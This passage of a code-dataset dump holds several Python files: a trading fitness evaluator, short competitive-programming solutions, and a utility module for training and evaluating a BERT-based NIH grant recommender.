\"\"\"\n Evaluate the fitness value of the Chromosome object\n The fitness value is the final wealth value after the 3-year training data\n\n :param ind: individual Chromosome object\n :return: the fitness value, i.e. wealth value\n \"\"\"\n start = dt.now()\n # rule_set = self._generator.create_rule_set(ind)\n rule_set, indicators = self._generator.create_rule_set(ind)\n data_selected = self._data[indicators]\n\n # Calculate the signals according to the fuzzy rule set\n decision = fuzzy.DecisionMaker(rule_set, data_selected)\n\n # signals = pd.DataFrame([0.5, -0.4, 0.2, 0.4, 0.1, -0.2, -0.3, 0.2, 0.3, 0.1], index=self._data.index,columns=['Signal'])\n\n signals = []\n # signals = decision.defuzzify(self._data) #signal is a dataframe\n for row_index, data_row in zip(range(len(data_selected)), data_selected.iterrows()):\n dictionary = dict(data_row[1])\n signal = decision.defuzzify(dictionary)\n signals.append(signal)\n\n self._data['Signal'] = signals\n print(\"::::: [evaluator] Calculate signals \", dt.now() - start, \":::::\")\n\n start = dt.now()\n # Calculate the fitness value according to the trading signals\n Hold = 0\n Money = 10000000\n Fortune = []\n for i, row in self._data.iterrows():\n Hold, Money, fortune = self.trade(row, Hold, Money)\n Fortune.append(fortune)\n self._data['Fortune'] = Fortune\n # self._data['Operation'] = 0\n # self._data.Operation[self._data.Signal > 0] = 1\n # self._data.Operation[self._data.Signal < 0] = -1\n fit_val = self._data.iloc[-1]['Fortune']\n\n print(\"::::: [evaluator] Calculate fitness value\", dt.now() - start, \":::::\")\n return fit_val\n","repo_name":"Sitao-zz/SignalProcessing","sub_path":"src/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2946057047","text":"P = int(input())\nQ = [ int(i) for i in input().split()]\nP = len(Q)\nU = 0\nfor Xt in range(0,P-2):\n for Yt in range(Xt+1, P-1):\n for Zt in range(Yt+1, P):\n if Q[Xt] > Q[Yt] > Q[Zt] :\n U =U+ 1\nprint(U)\n","repo_name":"manjupriyabalaji/pythonprog","sub_path":"36pro.py","file_name":"36pro.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13462074112","text":"from sys import stdin\r\nfrom math import ceil\r\ninput = stdin.readline\r\n\r\ns = input().rstrip()\r\nl = len(s)\r\n\r\nif s == s[0] * l:\r\n print(-1)\r\nelif s[:l//2][::-1] == s[ceil(l/2):]:\r\n print(l-1)\r\nelse:\r\n print(l) ","repo_name":"yootal/CodingTest","sub_path":"백준/Gold/15927. 회문은 회문아니야!!/회문은 회문아니야!!.py","file_name":"회문은 회문아니야!!.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4882469693","text":"from itertools import combinations\nif __name__ == \"__main__\":\n line = input()\n line = line.split(' ')\n M = int(line[0])\n numbers = [int(line[i]) for i in range(1, M + 1)]\n all_comb = list(combinations(numbers, 6))\n for comb in all_comb:\n for c in comb:\n print(c, end=' ')\n print()\n","repo_name":"larrychen20011120/DSA","sub_path":"Algorithm/Homework/HW2/arashi_lottery.py","file_name":"arashi_lottery.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24297318733","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 30 21:28:21 2022\n@author:ginnyzhu\nutility functions \n\n\"\"\"\n#general\nimport logging\nimport pickle\nimport json\nimport dill\nimport os\nimport sys \nimport pandas as pd\nimport numpy as np\nimport time\nimport datetime\nimport random\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport datefinder\n\n\n#fancy libraries\nimport torch \nimport torch.autograd as ag\nfrom termcolor import colored\n\"\"\"\nneed to fix master and year_weight stuff\n\"\"\"\n# parent sibling folder \nsys.path.append('../../')\nfrom RFOrecsys.weight.year_weight import YearWeight\nfrom functools import reduce\nimport itertools\n\n##### Data loading related\n\n#processing all the publications first \ndef get_corpus_and_dict(df, id_col, filepickle, field1, field2, out_addr = '', name1 ='corpus', name2 ='corpus_dict'):\n '''\n get a list of id order\n do the (repetitive) content list appending\n then also ids to content dictionary\n '''\n id_ls = df[id_col].tolist()\n corpus = [] #check if a list or list of listst\n corpus_dict = {}\n for id in id_ls:\n temp = filepickle[str(id)][field1] + ' ' + filepickle[str(id)][field2]\n corpus.append(temp)\n corpus_dict[id] = temp\n \n print('length of the corpus', len(corpus))# 106,446\n print('sample of the corpus', corpus[:2])\n #dump these lists:\n with open(out_addr + name1+ '.pickle', 'wb') as f:\n pickle.dump(corpus, f, protocol=pickle.HIGHEST_PROTOCOL)\n with open(out_addr + name2+ '.pickle', 'wb') as f:\n pickle.dump(corpus_dict, f, protocol=pickle.HIGHEST_PROTOCOL)\n \n return corpus, corpus_dict\n\n#for the nih rfa processing \ndef get_corpus_and_dict2(df, id_col, filecsv, file_id_col, field1, field2, out_addr = '', name1 ='corpus', name2 ='corpus_dict'):\n '''\n get a list of id order\n do the (repetitive) content list appending\n then also ids to content dictionary\n '''\n id_ls = df[id_col].tolist()\n corpus = [] #check if a list or list of listst\n corpus_dict = {}\n \n for id in id_ls:\n temp = filecsv.loc[filecsv[file_id_col]==id, field1].iloc[0] +' '+ filecsv.loc[filecsv[file_id_col]==id, field2].iloc[0]\n #break\n corpus.append(temp)\n corpus_dict[id] = temp\n \n print('length of the corpus', len(corpus))# 106,446\n print('sample of the corpus', corpus[:2])\n #dump these lists:\n with open(out_addr + name1+ '.pickle', 'wb') as f:\n pickle.dump(corpus, f, protocol=pickle.HIGHEST_PROTOCOL)\n with open(out_addr + name2+ '.pickle', 'wb') as f:\n pickle.dump(corpus_dict, f, protocol=pickle.HIGHEST_PROTOCOL)\n \n return corpus, corpus_dict\n\n\n\n######training related\n# Function to calculate the accuracy of our predictions vs labels\ndef flat_accuracy(preds, labels):\n pred_flat = np.argmax(preds, axis=1).flatten()\n labels_flat = labels.flatten()\n return np.sum(pred_flat == labels_flat) / len(labels_flat)\n\ndef format_time(elapsed):\n '''\n Takes a time in seconds and returns a string hh:mm:ss\n '''\n # Round to the nearest second.\n elapsed_rounded = int(round((elapsed)))\n # Format as hh:mm:ss\n return str(datetime.timedelta(seconds=elapsed_rounded))\n\n\ndef set_seed(seed_val):\n random.seed(seed_val)\n np.random.seed(seed_val)\n torch.manual_seed(seed_val)\n torch.cuda.manual_seed_all(seed_val)\n\n \ndef train_batch(Batch, model, optimizer, scheduler, cuda_device):# hyper_optim, vg): #optimizer, scheduler embScheduler,\n #modify furthere\n # emb related and actual model\n \n # Unpack this training batch from our dataloader. \n # `batch` contains three pytorch tensors:\n # [0]: input ids \n # [1]: attention masks\n # [2]:type_ids \n # [3]:labels\n # [4]:tfidf weights\n b_input_ids = Batch[0].cuda(cuda_device)\n b_input_mask = Batch[1].cuda(cuda_device)\n b_input_type_ids = Batch[2].cuda(cuda_device)\n b_labels = Batch[3].cuda(cuda_device)\n\n model.zero_grad() #because of the paramter tuning?\n\n loss, logits, Hidden = model(b_input_ids, \n token_type_ids=b_input_type_ids, \n attention_mask=b_input_mask, \n labels=b_labels)\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\n optimizer.step()\n scheduler.step()\n \n\n return loss, logits\n\n\n\n\ndef evaluate_batch(Batch, model, cuda_device):\n \n b_input_ids = Batch[0].cuda(cuda_device)\n b_input_mask = Batch[1].cuda(cuda_device)\n b_input_type_ids = Batch[2].cuda(cuda_device)\n b_labels = Batch[3].cuda(cuda_device)\n \n #_, b_weights = model.test_tfidf(embBatch[0])\n #b_weights = torch.from_numpy(b_weights).cuda(1)\n # Tell pytorch not to bother with constructing the compute graph during\n # the forward pass,\n with torch.no_grad(): \n\n (loss, logits, Hidden) = model(b_input_ids, \n token_type_ids=b_input_type_ids, \n attention_mask=b_input_mask,\n labels=b_labels)\n \n #loss, logits = model(embHidden, b_labels, b_weights)\n \n\n # Move logits and labels to CPU\n logits_cpu = logits.detach().cpu().numpy()\n label_ids_cpu = b_labels.cpu().numpy()\n\n return loss, logits_cpu, label_ids_cpu\n \n \n \n \n \ndef predictions(model, test_loader, use_cuda, path):\n model.eval()\n #model.bertEmb.eval()\n predictions , true_labels = [], []\n\n # Predict \n for batch in test_loader:\n #depends on what outputs are returned in the model, unpack the values\n loss, logits_cpu, label_ids_cpu = evaluate_batch(Batch = batch, \n #embModel = model.bertEmb, \n model = model, \n cuda_device =use_cuda)\n\n # Store predictions and true labels\n predictions.append(logits_cpu)\n true_labels.append(label_ids_cpu)\n \n print('...DONE.')\n combine_predictions = np.concatenate(predictions, axis=0)\n combine_true_labels = np.concatenate(true_labels, axis=0)\n\n # Calculate accuracy\n acc = flat_accuracy(combine_predictions, combine_true_labels) #not great 0.930, just bert and different split\n print('Test Accuracy: %.3f' % acc) \n \n np.save(path + 'combine_predictions', combine_predictions)\n np.save(path + 'combine_true_labels', combine_true_labels)\n \n return combine_predictions, combine_true_labels\n\n\n\n\n \ndef train(epochs, model, train_loader, valid_loader, optimizer, scheduler, use_cuda, tokenizer, args):\n \n training_stats = []\n #### Measure the total training time for the whole run.\n total_t0 = time.time()\n best_acc = 0.\n for epoch_i in range(0, epochs):\n\n # ========================================\n # Training\n # ========================================\n print(\"\")\n print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, epochs))\n print('Training...')\n\n # Measure how long the training epoch takes\n t0 = time.time()\n # Reset the total loss for this epoch.\n total_train_loss = 0\n model.train()\n #model.bertEmb.train()\n\n # For each batch of training data...\n for step, batch in enumerate(train_loader):#change this later \n\n # Progress update every 200 batches.\n if step % 200 == 0 and not step == 0:\n # Calculate elapsed time in minutes.\n elapsed = format_time(time.time() - t0)\n print(' Batch {:>5,} of {:>5,}. Elapsed: {:}.'.format(step, len(train_loader), elapsed))\n\n #b_weights = tfidf_vecs_weights[step* rfa.batch_size: (step+1)*rfa.batch_size]\n #depends on what outputs are returned in the model, unpack the values\n loss, logits = train_batch(Batch = batch, \n model = model, \n optimizer = optimizer,\n scheduler = scheduler, \n cuda_device = use_cuda)\n\n total_train_loss += loss.item()\n\n # Calculate the average loss over all of the batches.\n avg_train_loss = total_train_loss / len(train_loader) \n # Measure how long this epoch took.\n training_time = format_time(time.time() - t0)\n print(\"\")\n print(\" Average training loss: {0:.2f}\".format(avg_train_loss))\n print(\" Training epcoh took: {:}\".format(training_time))\n\n\n # call evaluation\n # ========================================\n # Validation\n # ========================================\n # After the completion of each training epoch, measure our performance on validation\n print(\"\")\n print(\"Running Validation...\")\n t0 = time.time()\n # Put the model in evaluation mode--the dropout layers behave differently during evaluation \n model.eval()\n #model.bertEmb.eval()\n\n # Tracking variables \n total_eval_accuracy = 0\n total_eval_loss = 0\n nb_eval_steps = 0\n\n\n for batch in valid_loader: \n #depends on what outputs are returned in the model, unpack the values\n loss, logits_cpu, label_ids_cpu = evaluate_batch(Batch = batch, \n #embModel = model.bertEmb, \n model = model, \n cuda_device =use_cuda)\n\n\n total_eval_loss += loss.item()\n total_eval_accuracy += flat_accuracy(logits_cpu, label_ids_cpu)\n\n avg_val_accuracy = total_eval_accuracy / len(valid_loader)\n print(\" Accuracy: {0:.2f}\".format(avg_val_accuracy))\n avg_val_loss = total_eval_loss / len(valid_loader)\n\n validation_time = format_time(time.time() - t0)\n print(\" Validation Loss: {0:.2f}\".format(avg_val_loss))\n print(\" Validation took: {:}\".format(validation_time))\n\n if avg_val_accuracy > best_acc:\n best_acc = avg_val_accuracy \n save_model(model_path = args.load_path, model = model, tokenizer = tokenizer, args = args)\n\n # Record all statistics from this epoch.\n training_stats.append(\n {\n 'epoch': epoch_i + 1,\n 'Training Loss': avg_train_loss,\n 'Valid. Loss': avg_val_loss,\n 'Valid. Accur.': avg_val_accuracy,\n 'Training Time': training_time,\n 'Validation Time': validation_time\n }\n )\n\n print(\"\")\n print(\"Training complete!\")\n print(\"Total training took {:} (h:mm:ss)\".format(format_time(time.time()-total_t0)))\n best_dict = torch.load(load_path + 'model.st')\n model.load_state_dict(best_dict)\n \n return training_stats, model\n \n\ndef save_model(model_path, model, tokenizer, args):\n # saving models\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n print(\"Saving model to %s\" % model_path)\n \n #save model\n dill.dump(model, open(model_path +'model', 'wb'))\n torch.save(model.state_dict(), model_path + 'model.st') \n model = model.module if hasattr(model, 'module') else model # distributed/parallel training\n model.save_pretrained(model_path)\n tokenizer.save_pretrained(model_path)\n # Good practice: save your training arguments together with the trained model\n torch.save(args, os.path.join(model_path, 'training_args.bin'))\n\n \ndef train_uq(epochs, model, train_loader, valid_loader, optimizer, scheduler, use_cuda, i, load_path, \\\n tokenizer, logger, option = 'mcdrop'):\n \n set_seed(i)\n \n training_stats = []\n #### Measure the total training time for the whole run.\n total_t0 = time.time()\n best_acc = 0.\n for epoch_i in range(0, epochs):\n\n # ========================================\n # Training\n # ========================================\n print(\"\")\n print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, epochs))\n print('Training...')\n\n # Measure how long the training epoch takes\n t0 = time.time()\n # Reset the total loss for this epoch.\n total_train_loss = 0\n model.train()\n\n # For each batch of training data...\n for step, batch in enumerate(train_loader):#change this later \n\n # Progress update every 200 batches.\n if step % 200 == 0 and not step == 0:\n # Calculate elapsed time in minutes.\n elapsed = format_time(time.time() - t0)\n print(' Batch {:>5,} of {:>5,}. Elapsed: {:}.'.format(step, len(train_loader), elapsed))\n\n #b_weights = tfidf_vecs_weights[step* rfa.batch_size: (step+1)*rfa.batch_size]\n #depends on what outputs are returned in the model, unpack the values\n loss, logits = train_batch(Batch = batch, \n model = model, \n optimizer = optimizer,\n scheduler = scheduler, \n cuda_device = use_cuda)\n total_train_loss += loss.item()\n\n # Calculate the average loss over all of the batches.\n avg_train_loss = total_train_loss / len(train_loader) \n # Measure how long this epoch took.\n training_time = format_time(time.time() - t0)\n print(\"\")\n print(\" Average training loss: {0:.2f}\".format(avg_train_loss))\n print(\" Training epcoh took: {:}\".format(training_time))\n\n\n\n # call evaluation\n # ========================================\n # Validation\n # ========================================\n # After the completion of each training epoch, measure our performance on validation\n print(\"\")\n print(\"Running Validation...\")\n t0 = time.time()\n # Put the model in evaluation mode--the dropout layers behave differently during evaluation \n model.eval()\n if option == 'mcdrop':\n enable_dropout(model)\n\n # Tracking variables \n total_eval_accuracy = 0\n total_eval_loss = 0\n nb_eval_steps = 0\n\n\n\n for batch in valid_loader: \n #depends on what outputs are returned in the model, unpack the values\n loss, logits_cpu, label_ids_cpu = evaluate_batch(Batch = batch, \n #embModel = model.bertEmb, \n model = model, \n cuda_device =use_cuda)\n\n\n total_eval_loss += loss.item()\n total_eval_accuracy += flat_accuracy(logits_cpu, label_ids_cpu)\n\n avg_val_accuracy = total_eval_accuracy / len(valid_loader)\n print(\" Accuracy: {0:.2f}\".format(avg_val_accuracy))\n avg_val_loss = total_eval_loss / len(valid_loader)\n\n validation_time = format_time(time.time() - t0)\n print(\" Validation Loss: {0:.2f}\".format(avg_val_loss))\n print(\" Validation took: {:}\".format(validation_time))\n\n if avg_val_accuracy > best_acc:\n best_acc = avg_val_accuracy \n save_model_uq(model_path = load_path, model = model, tokenizer = tokenizer, logger = logger)\n\n # Record all statistics from this epoch.\n training_stats.append(\n {\n 'epoch': epoch_i + 1,\n 'Training Loss': avg_train_loss,\n 'Valid. Loss': avg_val_loss,\n 'Valid. Accur.': avg_val_accuracy,\n 'Training Time': training_time,\n 'Validation Time': validation_time\n }\n )\n\n print(\"\")\n print(\"Training complete!\")\n print(\"Total training took {:} (h:mm:ss)\".format(format_time(time.time()-total_t0)))\n logger.error(\"epoch {}, training loss = {}, valid loss = {}, valid_accuracy = {}, train time = {}, valid time = {}\".format(\\\n epoch_i +1, avg_train_loss, avg_val_loss, avg_val_accuracy, training_time, validation_time))\n \n best_dict = torch.load(load_path + 'pytorch_model.bin')\n model.load_state_dict(best_dict)\n \n return training_stats, model\n \n \n \ndef enable_dropout(model):\n \"\"\" Function to enable the dropout layers during test-time \"\"\"\n for m in model.modules():\n if m.__class__.__name__.startswith('Dropout'):\n m.train()\n \n \n \n \ndef save_model_uq(model_path, model, tokenizer, logger):\n # saving models\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n print(\"Saving model to %s\" % model_path) \n logger.error(\"Saving model and tokenizer to %s\" % model_path)\n \n #save model\n dill.dump(model, open(model_path + 'model', 'wb'))\n # torch.save(model.state_dict(), model_path + 'model.st')\n model.save_pretrained(model_path)\n tokenizer.save_pretrained(model_path)\n # torch.save(args, os.path.join(model_path, 'training_args.bin'))\n\n\n\n\ndef evaluate_batch_uq(Batch, model, cuda_device, T =1):\n \n b_input_ids = Batch[0].cuda(cuda_device)\n b_input_mask = Batch[1].cuda(cuda_device)\n b_input_type_ids = Batch[2].cuda(cuda_device)\n b_labels = Batch[3].cuda(cuda_device)\n \n output_list = []\n loss_list = []\n with torch.no_grad():\n for i in range(T):\n # total of T forward passes \n (loss, logits, Hidden) = model(b_input_ids, \n token_type_ids=b_input_type_ids, \n attention_mask=b_input_mask,\n labels=b_labels)\n output_list.append(torch.unsqueeze(logits, dim= 0))\n loss_list.append(torch.unsqueeze(loss, dim= 0))#loss)\n \n output_mean = torch.cat(output_list, 0).mean(dim=0)\n output_variance = torch.cat(output_list, 0).var(dim=0).mean().item()\n confidence = output_mean.data.cpu().numpy().max()\n output_loss = torch.cat(loss_list,0).mean()\n\n # Move logits and labels to CPU\n logits_cpu = output_mean.detach().cpu().numpy()\n label_ids_cpu = b_labels.to('cpu').numpy()\n\n return output_loss, logits_cpu, label_ids_cpu, output_variance, confidence \n \ndef predictions_uq(model, test_loader, use_cuda, path, option = 'mcdrop', T = 1):\n \n model.eval()\n if option == 'mcdrop':\n enable_dropout(model)\n \n predictions, true_labels = [], []\n variances, confis = [], []\n\n # Predict \n for batch in test_loader:\n #depends on what outputs are returned in the model, unpack the values\n loss, logits_cpu, label_ids_cpu, variance, confidence = evaluate_batch_uq(Batch = batch, \n model = model, \n cuda_device =use_cuda, T= T)\n\n # Store predictions and true labels\n predictions.append(logits_cpu)\n true_labels.append(label_ids_cpu)\n # let's see \n variances.append(variance)\n confis.append(confidence)\n \n \n print('...DONE.')\n combine_predictions = np.concatenate(predictions, axis=0)\n combine_true_labels = np.concatenate(true_labels, axis=0)\n # let's see \n variances = np.asarray(variances)\n confis = np.asarray(confis)\n \n \n\n # Calculate accuracy\n acc = flat_accuracy(combine_predictions, combine_true_labels) #not great 0.930, just bert and different split\n print('Test Accuracy: %.3f' % acc) \n \n np.save(path + 'combine_predictions', combine_predictions)\n np.save(path + 'combine_true_labels', combine_true_labels)\n # let's see\n np.save(path + 'variances', variances) \n np.save(path + 'confidences', confis)\n \n return combine_predictions, combine_true_labels, variances, confis \n\n\n\ndef plot_train(training_stats, save_path = ''):\n \n # Display floats with two decimal places.\n pd.set_option('precision', 2)\n # Create a DataFrame from our training statistics.\n df_stats = pd.DataFrame(data=training_stats)\n # Use the 'epoch' as the row index.\n df_stats = df_stats.set_index('epoch')\n # A hack to force the column headers to wrap.\n #df = df.style.set_table_styles([dict(selector=\"th\",props=[('max-width', '70px')])])\n # Display the table.\n print(df_stats)\n df_stats.to_csv(save_path + 'df_stats.csv')\n \n # Use plot styling from seaborn.\n sns.set(style='darkgrid')\n # Increase the plot size and font size.\n sns.set(font_scale=1.5)\n plt.rcParams[\"figure.figsize\"] = (12,6)\n # Plot the learning curve.\n plt.plot(df_stats['Training Loss'], 'b-o', label=\"Training\")\n plt.plot(df_stats['Valid. Loss'], 'g-o', label=\"Validation\")\n # Label the plot.\n plt.title(\"Training & Validation Loss\")\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Loss\")\n plt.legend()\n plt.xticks(list(df_stats.index))\n plt.savefig(save_path + 'train_val_loss.png')\n plt.show();\n\n \n \n \n\n \ndef prob(x):\n \"\"\"Compute prob from logits.\"\"\"\n return np.exp(x[:,-1]) / (np.exp(x[:,-1]) +1) \n \ndef create_smilarity_dict(citation_df, combine_predictions, save_path):\n \n probas = prob(combine_predictions)\n ## comment below when actual testing\n # citation_df = citation_df.iloc[:len(probas), :].copy()\n citation_df['pred_prob1'] = probas\n pred_flat = np.argmax(combine_predictions, axis=1).flatten()\n citation_df['pred'] = pred_flat\n citation_df2 = citation_df[citation_df['pred'] == 1]\n \n pred_grouped = citation_df2.groupby(\"pmid\").agg(**{\n \"rfas_recom\": pd.NamedAgg(column='rfaid', aggfunc=lambda x:x.to_list()),\n \"rfas_prob\": pd.NamedAgg(column='pred_prob1', aggfunc=lambda x:x.to_list()) \n }).reset_index()\n print(pred_grouped.shape)\n print(pred_grouped.head())\n \n pred_grouped.to_csv(save_path + 'pred_grouped.csv', index = False)\n pred_grouped['leng'] = pred_grouped['rfas_prob'].str.len()\n max_length = pred_grouped['leng'].max()\n \n similarity_dict = {}\n for _,row in pred_grouped.iterrows():\n d = dict(zip(row['rfas_recom'], row['rfas_prob']))\n sort_d = dict(sorted(d.items(), key=lambda x: x[1], reverse=True))\n #print(sort_d)\n #break\n similarity_dict[row['pmid']] = sort_d \n with open(save_path + 'similarity_dict', 'wb') as handle:\n pickle.dump(similarity_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n return similarity_dict, max_length \n \n \n\n \ndef create_smilarity_dict2(citation_df, combine_predictions, save_path):\n \n #probas = prob(combine_predictions)\n probas = combine_predictions[:, -1]\n citation_df['pred_prob1'] = probas\n pred_flat = np.argmax(combine_predictions, axis=1).flatten()\n citation_df['pred'] = pred_flat\n citation_df2 = citation_df[citation_df['pred'] == 1]\n \n pred_grouped = citation_df2.groupby(\"pmid\").agg(**{\n \"rfas_recom\": pd.NamedAgg(column='rfaid', aggfunc=lambda x:x.to_list()),\n \"rfas_prob\": pd.NamedAgg(column='pred_prob1', aggfunc=lambda x:x.to_list()) \n }).reset_index()\n print(pred_grouped.shape)\n print(pred_grouped.head())\n \n pred_grouped.to_csv(save_path + 'pred_grouped.csv', index = False)\n pred_grouped['leng'] = pred_grouped['rfas_prob'].str.len()\n max_length = pred_grouped['leng'].max()\n \n similarity_dict = {}\n for _,row in pred_grouped.iterrows():\n d = dict(zip(row['rfas_recom'], row['rfas_prob']))\n sort_d = dict(sorted(d.items(), key=lambda x: x[1], reverse=True))\n #print(sort_d)\n #break\n similarity_dict[row['pmid']] = sort_d \n with open(save_path + 'similarity_dict', 'wb') as handle:\n pickle.dump(similarity_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n return similarity_dict, max_length \n \n \n \n \n## need to modify something from here\n\"\"\"\ndef processCVrfa(f_name, l_name, m_name, rfa_ls, processed_path = 'data/', output_path= 'results_v0/'):\n \n pubs_output = './resources/'+ l_name + '.pickle'\n cv_path= './resources/'+ l_name +'CV.pdf'\n output_path = output_path +l_name+'_output.json'\n \n old_time = datetime.now()\n final_data = Master().process(cv_path, pubs_output, f_name, l_name, m_name)\n final_data['researcher_name'] = f_name + ' ' + m_name + ' ' + l_name\n import json\n json.dump(final_data, open(output_path, 'w'), indent=4)\n print(datetime.now()-old_time)\n \n #read in what we are interested in\n with open(processed_path + f_name + l_name + '_pubDetails', 'rb') as f:\n pubD = pickle.load(f)\n with open(processed_path + f_name + l_name + '_pmids', 'rb') as f:\n pmids = pickle.load(f) \n \n #create pairs and save it \n pairs = list(itertools.product(pmids, rfa_ls))\n df = pd.DataFrame(pairs, columns =['pmid','rfaid']) \n df.to_csv(processed_path + f_name +l_name + '_df.csv', index = False)\n \n #create dataloader\n rfa = RFADataProcessForPred(path = 'data_processed/', whospubs= f_name+ l_name + '_pubDetails' ,\n load_pretrained = False, load_path = '../DLrec/model_save_v6/', nosplit= True)\n\n rfa.dataframize_()\n #then to dataloader \n test_loader, test_pr = rfa.dataloaderize_() #dataloader right \n \n return rfa, test_loader, test_pr\n\"\"\"\n\ndef evaluate_batch_woLabels(Batch, model, cuda_device, haslabels= False):\n \n b_input_ids = Batch[0].cuda(cuda_device)\n b_input_mask = Batch[1].cuda(cuda_device)\n b_input_type_ids = Batch[2].cuda(cuda_device)\n if haslabels: \n b_labels = Batch[3].cuda(cuda_device)\n \n with torch.no_grad():\n if haslabels:\n (loss, logits, Hidden) = model(b_input_ids, \n token_type_ids=b_input_type_ids, \n attention_mask=b_input_mask,\n labels=b_labels) \n \n else:\n (logits, Hidden) = model(b_input_ids, \n token_type_ids=b_input_type_ids, \n attention_mask=b_input_mask)\n \n\n # Move logits and labels to CPU\n logits_cpu = logits.detach().cpu().numpy()\n outputs = (logits_cpu,)\n if haslabels:\n label_ids_cpu = b_labels.to('cpu').numpy()\n outputs = (logits_cpu, label_ids_cpu, loss)\n\n return outputs\n\n\ndef getPredRes(model, test_loader, use_cuda, f_name, l_name):\n \n outpath = f_name.lower() + l_name.lower() + '/'\n \n model.eval()\n predictions , true_labels = [], []\n\n # Predict \n for batch in test_loader:\n #depends on what outputs are returned in the model, unpack the values\n logits_cpu, = evaluate_batch_woLabels(Batch = batch, \n model = model, \n cuda_device =use_cuda)\n\n # Store predictions and true labels\n predictions.append(logits_cpu)\n\n print('...DONE.')\n np.save(outpath + 'predictions', predictions)\n #stack all batches\n combine_predictions = np.concatenate(predictions, axis=0)\n #get the probablities\n probas = prob(combine_predictions)\n #get the predictions labels \n pred_flat = np.argmax(combine_predictions, axis=1).flatten()\n np.save(outpath + 'probas', probas)\n np.save(outpath + 'pred_flat', pred_flat)\n \n #save results toghether with the paired list\n df = pd.read_csv(outpath + 'df.csv')\n dfnew = df.iloc[:len(probas),:].copy()\n dfnew['probas'] = probas\n dfnew['pred_flat'] = pred_flat\n dfnew.to_csv(outpath+ 'preds_df.csv', index = False )\n \n return pred_flat, probas\n\n\ndef getGrantTypes(linktopage):\n \"\"\"\n linktopage: should be a single, syntaxtly correct url \n return: a list of content, could be len==1 or more\n \"\"\"\n page = requests.get(linktopage.strip(\" ;\")) # make sure url is clean\n try:\n soup = BeautifulSoup(page.content, 'html.parser')\n conts = []\n for elem in soup(href=lambda href: href and \"Search_Type=Activity\" in href):\n content = elem.parent.a.text + ' ' +elem.parent.a.find_next_sibling(text=True).strip(' ,')\n conts.append(content)\n return conts\n except:\n print('connection problem')\n \n \ndef mergeRes(pathTilName):\n \"\"\"\n mini function to combine recommendation results with clustering rsults \n \"\"\"\n with open( pathTilName + '_clusteredRes.json', 'r') as f:\n file1 = json.load(f)\n recommended_ls = []\n for k,v in file1.items():\n if len(v) != 0:\n recommended_ls.append(v)\n with open( pathTilName + '_outwname.json', 'r') as f:\n file2 = json.load(f)\n # file 2 is the target\n temp = file2['data']\n new_data = []\n assert len(temp) == len(recommended_ls)\n for i, each in enumerate(temp):\n #print(each)\n each.update({'recommended_rfas': recommended_ls[i]})\n new_data.append(each)\n file2['data'] = new_data\n # write it out \n with open(pathTilName+ '_output.json', 'w') as f:\n json.dump(file2, f, indent =4) \n \n\ncategory_types = {'R': 'Research Grants (R series)',\n 'K': 'Career Development Awards (K series)', \n 'T': 'Research Training and Fellowships (T & F series)',\n 'F': 'Research Training and Fellowships (T & F series)',\n 'P': 'Program Project/Center Grants (P series)'}\n \n \ndef renameRes(file):\n \"\"\"\n mini function to rewrite recommendation results with clustering rsults _output.json\n \"\"\"\n with open( file, 'r') as f:\n file1 = json.load(f)\n # file 2 is the target\n temp = file1['data']\n new_data = []\n for i, each in enumerate(temp):\n #print(each)\n each_rfa = each.pop('recommended_rfas')# this dictionary \n # renaming a bunch of things\n new_each_rfa = []\n for j, ele in enumerate(each_rfa):\n ele['id'] = ele.pop('rfa_id')\n ele['link'] = ele.pop('rfa_links')\n ele['title'] = ele.pop('rfa_title')\n ele['purpose'] = ele.pop('rfa_purpose')\n ztemp = ele.pop(\"rfa_releaseDate\")\n matches = list(datefinder.find_dates(ztemp))\n ele['release_date'] = matches[0].strftime('%m/%d/%Y') if len(matches)> 0 else ztemp\n ztemp = ele.pop(\"rfa_ExpireDate\")\n matches = list(datefinder.find_dates(ztemp))\n ele['expired_date'] = matches[0].strftime('%m/%d/%Y') if len(matches)> 0 else ztemp \n candis = re.findall(r'[a-zA-Z]{2}[0-9]{1}|[a-zA-Z]{1}[0-9]{2}',ele['title'])\n if len(candis) == 0:\n candi = 'UNK'\n elif len(candis) ==1:\n candi = candis[0]\n else:\n candi = '/'.join(candis)\n ele['Activity_Code'] = candi\n ele['Organization'] = ''\n ele['Clinical_Trials'] = ''\n ele['matched_words'] = ''\n ele['rank'] = j\n ele['score'] = 999\n ele[\"agency\"]= \"NIH\"\n ele['category'] = ele['Activity_Code']\n ele['type'] = category_types.get(ele['Activity_Code'][0], 'Other')\n ele.pop('rfa_types')\n new_each_rfa.append(ele) \n each.update({'recommended_rfos': new_each_rfa}) #list of 20\n new_data.append(each)\n file1['data'] = new_data\n # write it out\n print('writing to {}'.format(file))\n with open(file, 'w') as f:\n json.dump(file1, f, indent =4) \n \n \n \n \n \n \n \n \n \n \n \n \n \ndef clustered_recom(f_name, m_name, l_name, data_path, logger, top = 20):\n \n # publication cluster information\n out_path = f_name.lower() + l_name.lower() + '/'\n clusters = pickle.load(open( out_path +'clusteredPubs', 'rb'))\n all_pmids = pickle.load(open( out_path+'pmids', 'rb'))\n all_years = pickle.load(open( out_path+ 'pubYrs', 'rb'))\n #get the rfas \n rfas = pd.read_csv(data_path + 'processed_nih_grants_only.csv') \n \n #year weight formula\n yearW = YearWeight()\n \n #get the predictions with 1s only\n pred_df = pd.read_csv(out_path + 'preds_df.csv')\n pred_df_keep = 